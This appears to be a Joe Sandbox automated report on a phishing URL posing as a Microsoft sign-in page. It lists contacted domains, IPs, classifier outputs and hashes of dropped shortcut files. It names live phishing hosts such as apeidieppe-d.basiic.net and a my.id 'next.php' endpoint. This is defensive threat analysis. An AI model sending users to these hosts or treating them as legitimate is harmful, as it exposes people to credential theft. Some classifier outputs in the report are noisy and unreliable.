                            5102487645-1323985617.cos.eu-frankfurt.myqcloud.com
                            unknown
                            unknownfalse
                              unknown
                              aadcdn.msftauth.net
                              unknown
                              unknownfalse
                                unknown
                                NameMaliciousAntivirus DetectionReputation
                                https://5102487645.my.id/next.phpfalse
                                  unknown
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7007c/0x4AAAAAAAxiX9jZ_UpA8p2c/auto/fbE/normal/auto/false
                                    unknown
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8d6a0f0a98ece91e&lang=autofalse
                                      unknown
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv4/3XIyTgfM2rEpHtYU/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/false
                                        unknown
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/2056173471:1729602984:janUjwb74MX-m8qXT6ad2Z_xI1lxF850QjA1P3lVF8I/8d6a100ceca7e7db/lYFbgV1EjGkueHpW6EYxQQQEUNVfIQu82ev51.qUHPg-1729606140-1.1.1.1-dTHFouZjcc.yTEOsl29PZ8_pSIeeg9OdKhkIndp1UYbuUHEOFmLrYRiKjyBNFZ.0false
                                          unknown
                                          https://apeidieppe-d.basiic.net/yKKWd/bootstrap.min.css.maptrue
                                            unknown
                                            https://a.nel.cloudflare.com/report/v4?s=HHi8xveK8X3zmjMMsaI56NaBRpVCFoAEI9CfpJtWHkJs%2FZ3%2Fhj3qYWd5bZ43HQqp1itDOxLLbyV2vXma0KU%2BZ3rKc0yO7GDIXr21tncTbAQDlZoC3YLubCZFuGgHqWul4GHFUHsbfalse
                                              unknown
                                              https://code.jquery.com/jquery-3.2.1.slim.min.jsfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://5102487645-1323985617.cos.eu-frankfurt.myqcloud.com/bootstrap.min.jsfalse
                                                unknown
                                                https://challenges.cloudflare.com/turnstile/v0/api.jsfalse
                                                  unknown
                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8d6a100ceca7e7db&lang=autofalse
                                                    unknown
                                                    https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svgfalse
                                                      unknown
                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv3/ft_4y_PuFbfD3r8D/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/false
                                                        unknown
                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8d6a109478696b9a&lang=autofalse
                                                          unknown
                                                          https://apeidieppe-d.basiic.net/yKKWd/true
                                                            unknown
                                                            https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.jsfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js.mapfalse
                                                              unknown
                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8d6a10f63a046c33&lang=autofalse
                                                                unknown
                                                                https://a.nel.cloudflare.com/report/v4?s=OM5yjJ0VJtZ2suzhIvxM%2F09Rw4GnD7Q5seM8cH049LfQrpILNNjhBJxm9MkQnU17BE%2FHjCHTRfW%2FHj3r07nJpyoL3vFJSnEUcOvUceb3hhVahUXZqAw%2BWJDDDo77ZemLMlZgp4K4el0PgQ%3D%3Dfalse
                                                                  unknown
                                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7007c/0x4AAAAAAAxiX9jZ_UpA8p2c/auto/fbE/normal/auto/to.css.mapfalse
                                                                    unknown
                                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1404999773:1729602718:UZvFjMfw0a72K0DnQVvWkf_cJ8oGEoHDyA74KKOH6NY/8d6a10f63a046c33/cO9tUPOO1oMRkb0goA4TXv2TtUwkDfh7mWWvTLpIyCI-1729606178-1.1.1.1-LmynwZDJL511rAV_7PI8jhMXXWW7vCxKPpRpGqXQU7otoahf6IlBP1d7HO1_wi_Ffalse
                                                                      unknown
                                                                      https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.jsfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://5102487645.my.id/false
                                                                        unknown
                                                                        https://apeidieppe-d.basiic.net/favicon.icofalse
                                                                          unknown
                                                                          https://a.nel.cloudflare.com/report/v4?s=94LAg2WpngPxh8V8opwdSyAa7XvKNFcqbdikRbaDDi6yq7cOnk8nOLZDwSZp4tei%2B31zGJIcUzuPQsLLPbRr%2FS%2F0tl6XmahvtkHxsCyT5F%2FVyECHWIcWgBUqP0P5ei2ovb2%2BT5S6Sbe1jA%3D%3Dfalse
                                                                            unknown
                                                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8d6a0f0a98ece91e/1729606102483/7co4aaUL0qHQce5false
                                                                              unknown
                                                                              https://cdnjs.cloudflare.com/favicon.icofalse
                                                                                unknown
                                                                                https://apeidieppe-d.basiic.net/yKKWdfalse
                                                                                  unknown
                                                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1false
                                                                                    unknown
                                                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1571854637:1729602840:zvAtmTzhVMvcARSqZmG29O5V7h_Ph-feXgeguOMcDwY/8d6a0f0a98ece91e/bPN.remb.Z21oUkjCBQn607MW.5p7.j.runcpLO0s2k-1729606099-1.1.1.1-FxUbwo9qxrp3t45.o_DKYNcB3r6oK8pT8DAgKZ3z4VycwCeNNToDarphnbHVhIU.false
                                                                                      unknown
                                                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8d6a0f0a98ece91e/1729606102485/2b499979905af05a4e97622bbcf04e6b2e9563bd02bab4a959d000ca1bfedbd1/epifzsflhhzta5xfalse
                                                                                        unknown
                                                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/false
                                                                                          unknown
                                                                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv2/-VbzSdWhMfLGjLct/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/false
                                                                                            unknown
                                                                                            https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.jsfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://5102487645.my.id/favicon.icofalse
                                                                                              unknown
                                                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1663307380:1729602922:dyPvKmin_wzAo2C88WuK9CW0ZVzLH_3eb5wHWsr8Qrk/8d6a11797f676b79/me1tc4vUmkicP8.VscZFk3.OWoJoK2idGfDErTidurQ-1729606199-1.1.1.1-TJXXa8B2Pog9OrwwlbuL93z7hRM2wMysKwxKfW88AF7R.yK_axu992q9wTMsHQ6ffalse
                                                                                                unknown
                                                                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8d6a11d74de3e83b&lang=autofalse
                                                                                                  unknown
                                                                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv1/bpy9ZfXXCgwSaYHz/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/false
                                                                                                    unknown
                                                                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8d6a11797f676b79&lang=autofalse
                                                                                                      unknown
                                                                                                      https://challenges.cloudflare.com/turnstile/v0/g/f2bbd6738e15/api.jsfalse
                                                                                                        unknown
                                                                                                        https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js.mapfalse
                                                                                                          unknown
                                                                                                          https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js.mapfalse
                                                                                                            unknown
                                                                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                                                                            https://getbootstrap.com/)chromecache_92.1.dr, chromecache_97.1.drfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://github.com/twbs/bootstrap/graphs/contributors)chromecache_121.1.dr, chromecache_92.1.dr, chromecache_106.1.dr, chromecache_97.1.drfalse
                                                                                                              unknown
                                                                                                              https://getbootstrap.com)chromecache_121.1.dr, chromecache_106.1.drfalse
                                                                                                                unknown
                                                                                                                https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_121.1.dr, chromecache_92.1.dr, chromecache_106.1.dr, chromecache_97.1.drfalse
                                                                                                                  unknown
                                                                                                                  http://opensource.org/licenses/MIT).chromecache_104.1.dr, chromecache_115.1.dr, chromecache_98.1.drfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  • No. of IPs < 25%
                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                  • 75% < No. of IPs
                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                  104.18.10.207
                                                                                                                  unknownUnited States
                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                  104.18.94.41
                                                                                                                  challenges.cloudflare.comUnited States
                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                  162.62.150.187
                                                                                                                  unknownSingapore
                                                                                                                  132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNfalse
                                                                                                                  151.101.66.137
                                                                                                                  unknownUnited States
                                                                                                                  54113FASTLYUSfalse
                                                                                                                  35.190.80.1
                                                                                                                  a.nel.cloudflare.comUnited States
                                                                                                                  15169GOOGLEUSfalse
                                                                                                                  162.241.71.126
                                                                                                                  5102487645.my.idUnited States
                                                                                                                  26337OIS1USfalse
                                                                                                                  104.17.24.14
                                                                                                                  cdnjs.cloudflare.comUnited States
                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                  104.18.95.41
                                                                                                                  unknownUnited States
                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                  151.101.2.137
                                                                                                                  code.jquery.comUnited States
                                                                                                                  54113FASTLYUSfalse
                                                                                                                  104.18.11.207
                                                                                                                  stackpath.bootstrapcdn.comUnited States
                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                  162.62.150.176
                                                                                                                  ger.file.myqcloud.comSingapore
                                                                                                                  132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNfalse
                                                                                                                  13.107.253.72
                                                                                                                  s-part-0044.t-0009.fb-t-msedge.netUnited States
                                                                                                                  8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                  239.255.255.250
                                                                                                                  unknownReserved
                                                                                                                  unknownunknownfalse
                                                                                                                  188.114.97.3
                                                                                                                  apeidieppe-d.basiic.netEuropean Union
                                                                                                                  13335CLOUDFLARENETUStrue
                                                                                                                  152.199.21.175
                                                                                                                  sni1gl.wpc.omegacdn.netUnited States
                                                                                                                  15133EDGECASTUSfalse
                                                                                                                  172.217.16.196
                                                                                                                  www.google.comUnited States
                                                                                                                  15169GOOGLEUSfalse
                                                                                                                  104.17.25.14
                                                                                                                  unknownUnited States
                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                  IP
                                                                                                                  192.168.2.16
                                                                                                                  192.168.2.5
                                                                                                                  192.168.2.22
                                                                                                                  127.0.0.1
                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                  Analysis ID:1539393
                                                                                                                  Start date and time:2024-10-22 16:07:39 +02:00
                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                  Overall analysis duration:0h 3m 47s
                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                  Report type:full
                                                                                                                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                  Sample URL:https://apeidieppe-d.basiic.net/yKKWd
                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                  Number of analysed new started processes analysed:13
                                                                                                                  Number of new started drivers analysed:0
                                                                                                                  Number of existing processes analysed:0
                                                                                                                  Number of existing drivers analysed:0
                                                                                                                  Number of injected processes analysed:0
                                                                                                                  Technologies:
                                                                                                                  • HCA enabled
                                                                                                                  • EGA enabled
                                                                                                                  • AMSI enabled
                                                                                                                  Analysis Mode:default
                                                                                                                  Analysis stop reason:Timeout
                                                                                                                  Detection:MAL
                                                                                                                  Classification:mal68.phis.win@25/64@56/21
                                                                                                                  EGA Information:Failed
                                                                                                                  HCA Information:
                                                                                                                  • Successful, ratio: 100%
                                                                                                                  • Number of executed functions: 0
                                                                                                                  • Number of non-executed functions: 0
                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                  • Excluded IPs from analysis (whitelisted): 142.250.184.195, 172.217.16.142, 142.250.110.84, 34.104.35.123, 216.58.206.42, 142.250.185.170, 142.250.185.106, 142.250.186.170, 142.250.186.74, 172.217.18.10, 172.217.16.138, 172.217.23.106, 216.58.206.74, 142.250.186.106, 142.250.184.202, 172.217.16.202, 142.250.186.42, 142.250.74.202, 142.250.185.138, 142.250.186.138, 172.217.18.14, 142.250.186.67, 216.58.206.46, 142.250.185.238
                                                                                                                  • Excluded domains from analysis (whitelisted): clients1.google.com, azurefd-t-fb-prod.trafficmanager.net, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ajax.googleapis.com, aadcdnoriginwus2.azureedge.net, clientservices.googleapis.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com
                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                  • VT rate limit hit for: https://apeidieppe-d.basiic.net/yKKWd
                                                                                                                  No simulations
                                                                                                                  InputOutput
                                                                                                                  URL: https://apeidieppe-d.basiic.net/yKKWd/ Model: claude-3-haiku-20240307
                                                                                                                  ```json
                                                                                                                  {
                                                                                                                    "contains_trigger_text": true,
                                                                                                                    "trigger_text": "Browser security sweep in progress.",
                                                                                                                    "prominent_button_name": "unknown",
                                                                                                                    "text_input_field_labels": "unknown",
                                                                                                                    "pdf_icon_visible": false,
                                                                                                                    "has_visible_captcha": false,
                                                                                                                    "has_urgent_text": false,
                                                                                                                    "has_visible_qrcode": false
                                                                                                                  }
                                                                                                                  URL: https://apeidieppe-d.basiic.net/yKKWd/ Model: claude-3-haiku-20240307
                                                                                                                  ```json
                                                                                                                  {
                                                                                                                    "contains_trigger_text": true,
                                                                                                                    "trigger_text": "Browser security sweep in progress.",
                                                                                                                    "prominent_button_name": "unknown",
                                                                                                                    "text_input_field_labels": "unknown",
                                                                                                                    "pdf_icon_visible": false,
                                                                                                                    "has_visible_captcha": false,
                                                                                                                    "has_urgent_text": false,
                                                                                                                    "has_visible_qrcode": false
                                                                                                                  }
                                                                                                                  URL: https://apeidieppe-d.basiic.net/yKKWd/ Model: claude-3-haiku-20240307
                                                                                                                  ```json
                                                                                                                  {
                                                                                                                    "brands": []
                                                                                                                  }
                                                                                                                  URL: https://apeidieppe-d.basiic.net/yKKWd/ Model: claude-3-haiku-20240307
                                                                                                                  ```json
                                                                                                                  {
                                                                                                                    "brands": [
                                                                                                                      "Cloudflare"
                                                                                                                    ]
                                                                                                                  }
                                                                                                                  URL: https://apeidieppe-d.basiic.net/yKKWd/ Model: claude-3-haiku-20240307
                                                                                                                  ```json
                                                                                                                  {
                                                                                                                    "contains_trigger_text": true,
                                                                                                                    "trigger_text": "Sign In",
                                                                                                                    "prominent_button_name": "Next",
                                                                                                                    "text_input_field_labels": [
                                                                                                                      "Email, phone, or Skype"
                                                                                                                    ],
                                                                                                                    "pdf_icon_visible": false,
                                                                                                                    "has_visible_captcha": false,
                                                                                                                    "has_urgent_text": false,
                                                                                                                    "has_visible_qrcode": false
                                                                                                                  }
                                                                                                                  URL: https://apeidieppe-d.basiic.net/yKKWd/ Model: claude-3-haiku-20240307
                                                                                                                  ```json
                                                                                                                  {
                                                                                                                    "brands": [
                                                                                                                      "Microsoft"
                                                                                                                    ]
                                                                                                                  }
                                                                                                                  URL: https://5102487645.my.id/ Model: claude-3-haiku-20240307
                                                                                                                  ```json
                                                                                                                  {
                                                                                                                    "contains_trigger_text": true,
                                                                                                                    "trigger_text": "Initializing browser security protocols.",
                                                                                                                    "prominent_button_name": "unknown",
                                                                                                                    "text_input_field_labels": "unknown",
                                                                                                                    "pdf_icon_visible": false,
                                                                                                                    "has_visible_captcha": false,
                                                                                                                    "has_urgent_text": false,
                                                                                                                    "has_visible_qrcode": false
                                                                                                                  }
                                                                                                                  URL: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js Model: claude-3-haiku-20240307
                                                                                                                  ```json
                                                                                                                  {
                                                                                                                    "contains_trigger_text": true,
                                                                                                                    "trigger_text": "VIEW SHARED FILE",
                                                                                                                    "prominent_button_name": "VIEW SHARED FILE",
                                                                                                                    "text_input_field_labels": [
                                                                                                                      "Email Address",
                                                                                                                      "Password"
                                                                                                                    ],
                                                                                                                    "pdf_icon_visible": false,
                                                                                                                    "has_visible_captcha": false,
                                                                                                                    "has_urgent_text": true,
                                                                                                                    "has_visible_qrcode": false
                                                                                                                  }
                                                                                                                  URL: https://5102487645.my.id/ Model: claude-3-haiku-20240307
                                                                                                                  ```json
                                                                                                                  {
                                                                                                                    "brands": []
                                                                                                                  }
                                                                                                                  URL: https://apeidieppe-d.basiic.net/yKKWd/ Model: gpt-4o
                                                                                                                  ```json{  "legit_domain": "microsoft.com",  "classification": "wellknown",  "reasons": [    "The brand 'Microsoft' is classified as 'wellknown'.",    "The legitimate domain for Microsoft is 'microsoft.com'.",    "The provided URL 'apeidieppe-d.basiic.net' does not match the legitimate domain for Microsoft.",    "The URL contains suspicious elements such as an unusual domain name 'basiic.net' and a subdomain 'apeidieppe-d' which are not associated with Microsoft.",    "The presence of input fields for 'Email, phone, or Skype' is typical for Microsoft services, but the domain mismatch is a strong indicator of phishing."  ],  "riskscore": 9}
                                                                                                                  Google indexed: False
                                                                                                                  URL: apeidieppe-d.basiic.net
                                                                                                                              Brands: Microsoft
                                                                                                                              Input Fields: Email, phone, or Skype
                                                                                                                  URL: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js Model: claude-3-haiku-20240307
                                                                                                                  ```json
                                                                                                                  {
                                                                                                                    "brands": [
                                                                                                                      "Popper"
                                                                                                                    ]
                                                                                                                  }
                                                                                                                  URL: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js Model: gpt-4o
                                                                                                                  ```json{  "legit_domain": "popper.js.org",  "classification": "unknown",  "reasons": [    "The URL 'cdnjs.cloudflare.com' is a legitimate domain associated with Cloudflare, a well-known content delivery network.",    "The brand 'Popper' is not widely recognized as a standalone brand and is more likely a library or tool, which is often hosted on CDNs like Cloudflare.",    "The presence of input fields such as 'Email Address' and 'Password' on a CDN domain is unusual and could indicate misuse, as CDNs typically serve static content.",    "There is no direct association between 'Popper' and the domain 'cdnjs.cloudflare.com' that would suggest a legitimate login page."  ],  "riskscore": 7}
                                                                                                                  URL: cdnjs.cloudflare.com
                                                                                                                              Brands: Popper
                                                                                                                              Input Fields: Email Address, Password
                                                                                                                  No context
                                                                                                                  No context
                                                                                                                  No context
                                                                                                                  No context
                                                                                                                  No context
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 22 13:08:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2673
                                                                                                                  Entropy (8bit):3.9901968569306603
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:8MdDTrbjHmZidAKZdA1FehwiZUklqehHMy+3:8sjomMy
                                                                                                                  MD5:96576D74D85A056BDC209AD135B49837
                                                                                                                  SHA1:24B377ED66912676AA465877EB20EE708AF2E4CC
                                                                                                                  SHA-256:7089B78AF6281D14AA79E5B11D4D8062F5A6F7C46F0B621D52EE01C6DCDE5125
                                                                                                                  SHA-512:60A4900380454ED072B929F32F98DE0C19BAE2BC4EAC7514095A000EB5DAAEE9E9D1C35C42A77817E3E8A2E13A61CB3C0AF5150375AA31EF528494723FF0EC60
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:L..................F.@.. ...$+.,......f.$..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IVY.p....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VVY.q....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VVY.q....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VVY.q..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VVY.q...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........s........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 22 13:08:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2675
                                                                                                                  Entropy (8bit):4.005603713385212
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:8XLdDTrbjHmZidAKZdA1seh/iZUkAQkqehWMy+2:8Jje9QBMy
                                                                                                                  MD5:7D6D99491C6B8C72414A0FE8F1D9A8D7
                                                                                                                  SHA1:535B0624D9456CB95077D15E538421F8618E7BD5
                                                                                                                  SHA-256:CB56C2B13EA74ED635050D8E2F37BCD4937603E0D88658129E0CAAF526D2CEB1
                                                                                                                  SHA-512:52241A1675E5CE382D48F24CCADB8F20D47DFEC713B6FBFAA3CE82876041813876D1F9AD49206586C77009FB4E11D680FAAC6AE7B208ECAF0A7499FEE8A43CAE
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:L..................F.@.. ...$+.,....?.V.$..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IVY.p....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VVY.q....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VVY.q....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VVY.q..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VVY.q...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........s........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2689
                                                                                                                  Entropy (8bit):4.011800518069314
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:8LdDTrbAHmZidAKZdA14meh7sFiZUkmgqeh7sgMy+BX:85jjnqMy
                                                                                                                  MD5:DB082705C83FB36E56DE4A469D22EA77
                                                                                                                  SHA1:E3EC77DCFD7BBDBD62ED80A0FA6FB9DD2DE940B0
                                                                                                                  SHA-256:FDB2BD8BB8A02950D400C7AE440530DCBD777395F522DBBBAC2DAADA2128CB24
                                                                                                                  SHA-512:2C33577772A06DE4408E45E24F0FCE9C471DEE6698F3DFA64027F60F1FEDFB48F3E6D3D2104CE7926F63A89B621D74E6FB9606D2BE8B6C474590773EF7C4A735
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IVY.p....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VVY.q....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VVY.q....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VVY.q..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........s........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 22 13:08:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2677
                                                                                                                  Entropy (8bit):4.002551360750778
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:8bdDTrbjHmZidAKZdA1TehDiZUkwqehyMy+R:8pjVIMy
                                                                                                                  MD5:14DA3A85B510329FEFA6C44F240392B9
                                                                                                                  SHA1:D176BA7866DE5179E9C870A7707C70EB8AD715DB
                                                                                                                  SHA-256:B3767B4633B3C04599A67AB309671DB0B0FE8889165A1088831BD2F92D285901
                                                                                                                  SHA-512:37E1747C327997CBFED5C144A5495FE357C6D16C6382744DF82E257C203B6C7898EFAC1D275DDEDDED876E6CF9196191AE7731001147EB944A2F7FE471F202EF
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
